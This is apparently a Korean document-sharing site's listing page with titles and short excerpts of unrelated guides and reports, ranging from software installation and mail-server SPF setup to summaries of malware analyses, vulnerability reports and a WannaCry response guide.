Splentec V-WORM Quick Installation Guide Version: 1.0 Contact Information 올리브텍 주소 : 경기도성남시분당구구미로 11 ( 포인트타운 701호 ) URL: E-M

Splentec V-WORM Quick Installation Guide Version: 1.0 Contact Information 올리브텍 주소 : 경기도성남시분당구구미로 11 ( 포인트타운 701호 ) URL:   E-M Splentec V-WORM Quick Installation Guide Version: 1.0 Contact Information 올리브텍 주소 : 경기도성남시분당구구미로 11 ( 포인트타운 701호 ) URL: http://www.olivetech.co.kr E-Mail: tech@olivetech.co.kr TEL: 031-726-4217 FAX: 031-726-4219

More information

메일서버등록제(SPF) 인증기능적용안내서 (HP-UX - qmail) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 HP-UX 11.11i qmail 1.03 spf-filter 년 6 월

메일서버등록제(SPF) 인증기능적용안내서 (HP-UX - qmail) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 HP-UX 11.11i qmail 1.03 spf-filter 년 6 월 메일서버등록제(SPF) 인증기능적용안내서 (HP-UX - qmail) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 HP-UX 11.11i qmail 1.03 spf-filter 1.0 2016 년 6 월 목 차 I. 개요 1 1. SPF( 메일서버등록제) 란? 1 2. SPF 를이용한이메일인증절차 1 II. qmail, SPF 인증모듈설치

More information

신종파밍악성코드분석 Bolaven

신종파밍악성코드분석 Bolaven 신종파밍악성코드분석 Bolaven 2013.06.27 개요 지난 1월볼라벤 6차문서에서진화한파밍기법 (= 호스트파일변조 ) 에대해분석및공유를하였다. 6차문서에서는웹을통하여악성코드가유포되는과정과파밍기법의전반적인흐름을알아보았다면, 이번문서에서는파밍기법에서사용되는악성파일의행위에대해중점적으로분석하였다. 파밍기법이란? PC 를악성코드에감염시켜정상홈페이지주소로접속하여도피싱사이트로

More information

JDK이클립스

JDK이클립스 JDK 와이클립스설치 A. JDK 다운로드, 설치및환경설정 지금부터 JDK를다운로드받아설치하고 JDK를윈도우에서활용할수있도록환경을설정하는전과정을소개한다. 다운로드 www.oracle.com 사이트에접속하여 Downloads 메뉴를선택한후 [ 그림 1] 과같이 "Java for Developers" 를클릭한다. [ 그림 1] www.oracle.com 사이트

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 Deep Learning 작업환경조성 & 사용법 ISL 안재원 Ubuntu 설치 작업환경조성 접속방법 사용예시 2 - ISO file Download www.ubuntu.com Ubuntu 설치 3 - Make Booting USB Ubuntu 설치 http://www.pendrivelinux.com/universal-usb-installer-easy-as-1-2-3/

More information

SIGIL 완벽입문

SIGIL 완벽입문 누구나 만드는 전자책 SIGIL 을 이용해 전자책을 만들기 EPUB 전자책이 가지는 단점 EPUB이라는 포맷과 제일 많이 비교되는 포맷은 PDF라는 포맷 입니다. EPUB이 나오기 전까지 전 세계에서 가장 많이 사용되던 전자책 포맷이고, 아직도 많이 사 용되기 때문이기도 한며, 또한 PDF는 종이책 출력을 위해서도 사용되기 때문에 종이책 VS

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 BOOTLOADER Jo, Heeseung 부트로더컴파일 부트로더소스복사및압축해제 부트로더소스는웹페이지에서다운로드 /working 디렉터리로이동한후, wget으로다운로드 이후작업은모두 /working 디렉터리에서진행 root@ubuntu:# cp /media/sm5-linux-111031/source/platform/uboot-s4210.tar.bz2 /working

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 사용자계정관리 운영체제실습 목차 Ⅲ. 사용자계정관리 4.1 사용자계정관리 4.2 그룹관리 4.3 사용자계정관련파일 4.4 패스워드관리 4.5 사용자신분확인 4.1 사용자계정관리 사용자생성관련명령어 사용자생성 : useradd / adduser 사용자삭제 : userdel 사용자정보변경 : usermod 패스워드설정및변경 : passwd 그룹생성관련명령어 group

More information

슬라이드 1

슬라이드 1 악성코드유포에홗용되는 난독화기법분석 이민섭 NBP 포털서비스보앆팀 c 2011 NHN CORPORATION 목차 1. 악성코드유포및감염 2. 최근웹사이트공격동향 3. 난독화공격코드 3.1 난독화에대한정의 3.2 공격코드의난독화주요방법 3.3 난독화공격코드사례 4. 악성코드바이너리의특징과목적 5. 결롞 1. 악성코드유포및감염 1. 악성코드유포및감염 이메일첨부파일을이용한악성코드유포

More information

슬라이드 1

슬라이드 1 SW 개발도구연계 Jenkins - Redmine - Mylyn 목차 Intro Mylyn - Redmine 연계 Mylyn - Jenkins 연계및빌드실행 Mylyn에서 Redmine 일감처리 Intro 연계도구 웹기반의프로젝트관리도구 한글화가잘되어있어사용저변이넓음 플러그인을통해다양한도구와연계가능 Eclipse 용 ALM(Application Lifecycle

More information

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 악성코드유포지현황 3 - 유포지탐지현황 3 - 대량경유지가탐지된유포지 TOP 악성코드취약점및취약한 S/W 악용현황 5 - 악성코드유형별비율 6 - 위협 IP/ 도메인현황 7 2

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 악성코드유포지현황 3 - 유포지탐지현황 3 - 대량경유지가탐지된유포지 TOP 악성코드취약점및취약한 S/W 악용현황 5 - 악성코드유형별비율 6 - 위협 IP/ 도메인현황 7 2 월간악성코드은닉사이트탐지 동향보고서 (1 월 ) 2015. 02. 침해사고대응단 인터넷침해대응본부 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 3 2.1 악성코드유포지현황 3 - 유포지탐지현황 3 - 대량경유지가탐지된유포지 TOP10 4 - 악성코드취약점및취약한 S/W 악용현황 5 - 악성코드유형별비율 6 - 위협 IP/ 도메인현황

More information

untitled

untitled Oracle DBMS 로그인의접근제어우회 취약점분석 2006. 2. 9 인터넷침해사고대응지원센터 (KISC) 본보고서의전부나일부를인용시반드시 [ 자료 : 한국정보보호진흥원 (KISA)] 룰명시하여주시기바랍니다. 개요 o 2005년이후 Oracle Critical Patch Update(CPU) 는 Oracle사제품대상으로다수의보안패치및보안패치와관련된일반패치를발표하는주요수단임

More information

Windows Server 2012

Windows Server  2012 Windows Server 2012 Shared Nothing Live Migration Shared Nothing Live Migration 은 SMB Live Migration 방식과다른점은 VM 데이터파일의위치입니다. Shared Nothing Live Migration 방식은 Hyper-V 호스트의로컬디스크에 VM 데이터파일이위치합니다. 반면에, SMB

More information

Microsoft PowerPoint Android-SDK설치.HelloAndroid(1.0h).pptx

Microsoft PowerPoint Android-SDK설치.HelloAndroid(1.0h).pptx To be an Android Expert 문양세강원대학교 IT 대학컴퓨터학부 Eclipse (IDE) JDK Android SDK with ADT IDE: Integrated Development Environment JDK: Java Development Kit (Java SDK) ADT: Android Development Tools 2 JDK 설치 Eclipse

More information

취약점분석보고서 [Photodex ProShow Producer v ] RedAlert Team 안상환

취약점분석보고서 [Photodex ProShow Producer v ] RedAlert Team 안상환 취약점분석보고서 [Photodex ProShow Producer v5.0.3256] 2012-07-24 RedAlert Team 안상환 목 차 1. 개요... 1 1.1. 취약점분석추진배경... 1 2. Photodex ProShow Producer Buffer Overflow 취약점분석... 2 2.1. Photodex ProShow Producer Buffer

More information

- 목차 - Q1. 어떤 Windows 운영체제가취약점에영향을받나요? 1 Q2. 해당랜섬웨어를예방하기위해서는어떻게해야하나요? 1 Q3. SMB 포트는어떻게차단하나요? 1 Q4. 보안패치는어떻게하나요? 3 Q5. 보안패치가됐는지어떻게확인하나요? 5 Q6. 스마트폰도랜섬웨

- 목차 - Q1. 어떤 Windows 운영체제가취약점에영향을받나요? 1 Q2. 해당랜섬웨어를예방하기위해서는어떻게해야하나요? 1 Q3. SMB 포트는어떻게차단하나요? 1 Q4. 보안패치는어떻게하나요? 3 Q5. 보안패치가됐는지어떻게확인하나요? 5 Q6. 스마트폰도랜섬웨 QnA 형식으로알아보는 WannaCry 랜섬웨어 대응가이드 2017. 05 본보고서의전부나일부를인용시, 반드시 [ 자료 : 한국인터넷진흥원 (KISA)] 를명시하여주시기바랍니다. - 목차 - Q1. 어떤 Windows 운영체제가취약점에영향을받나요? 1 Q2. 해당랜섬웨어를예방하기위해서는어떻게해야하나요? 1 Q3. SMB 포트는어떻게차단하나요? 1 Q4. 보안패치는어떻게하나요?

More information

AhnLab_template

AhnLab_template Injection 기법및분석법 공개버전 2014.04.17 안랩시큐리티대응센터 (ASEC) 분석팀차민석책임연구원 Contents 01 02 03 04 05 06 07 왜 Injection 기법인가? Injection 기법배경지식 DLL Inection 기법 Code Injection 기법유용한도구 Case study 맺음말및과제 01 왜 Injection 기법인가?

More information

ASEC REPORT VOL.71 November, 2015 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에

ASEC REPORT VOL.71 November, 2015 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에 Security Trend ASEC REPORT VOL.71 November, 2015 ASEC REPORT VOL.71 November, 2015 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,

More information